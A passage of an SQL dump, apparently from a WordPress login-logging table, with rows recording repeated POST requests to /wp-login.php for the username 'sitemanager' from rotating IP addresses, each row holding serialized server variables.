Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60038\";s:11:\"REMOTE_ADDR\";s:14:\"134.209.104.76\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745546199.414835;s:12:\"REQUEST_TIME\";i:1745546199;}}','134.209.104.76',0,'2025-04-25 07:26:41','1970-01-01 00:00:00'),(94233,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"47226\";s:11:\"REMOTE_ADDR\";s:12:\"66.29.146.29\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745546606.5304379;s:12:\"REQUEST_TIME\";i:1745546606;}}','66.29.146.29',0,'2025-04-25 07:33:28','1970-01-01 00:00:00'),(94234,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55620\";s:11:\"REMOTE_ADDR\";s:15:\"172.104.232.115\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745547012.216538;s:12:\"REQUEST_TIME\";i:1745547012;}}','172.104.232.115',0,'2025-04-25 07:40:14','1970-01-01 00:00:00'),(94235,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50636\";s:11:\"REMOTE_ADDR\";s:12:\"62.60.160.33\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745547425.7818611;s:12:\"REQUEST_TIME\";i:1745547425;}}','62.60.160.33',0,'2025-04-25 07:47:07','1970-01-01 00:00:00'),(94236,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"34370\";s:11:\"REMOTE_ADDR\";s:12:\"5.202.15.246\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745547832.7947929;s:12:\"REQUEST_TIME\";i:1745547832;}}','5.202.15.246',0,'2025-04-25 07:53:54','1970-01-01 00:00:00'),(94237,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"33202\";s:11:\"REMOTE_ADDR\";s:12:\"91.151.95.70\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745548239.4323499;s:12:\"REQUEST_TIME\";i:1745548239;}}','91.151.95.70',0,'2025-04-25 08:00:41','1970-01-01 00:00:00'),(94238,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59988\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.114.29\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745548650.973876;s:12:\"REQUEST_TIME\";i:1745548650;}}','198.54.114.29',0,'2025-04-25 08:07:32','1970-01-01 00:00:00'),(94239,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54106\";s:11:\"REMOTE_ADDR\";s:13:\"66.29.137.140\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745549062.499686;s:12:\"REQUEST_TIME\";i:1745549062;}}','66.29.137.140',0,'2025-04-25 08:14:24','1970-01-01 00:00:00'),(94240,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50160\";s:11:\"REMOTE_ADDR\";s:12:\"66.29.137.63\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745549475.073374;s:12:\"REQUEST_TIME\";i:1745549475;}}','66.29.137.63',0,'2025-04-25 08:21:16','1970-01-01 00:00:00'),(94241,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51586\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.120.87\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745549890.123426;s:12:\"REQUEST_TIME\";i:1745549890;}}','198.54.120.87',0,'2025-04-25 08:28:12','1970-01-01 00:00:00'),(94242,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"47118\";s:11:\"REMOTE_ADDR\";s:14:\"183.90.183.156\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745550300.640167;s:12:\"REQUEST_TIME\";i:1745550300;}}','183.90.183.156',0,'2025-04-25 08:35:02','1970-01-01 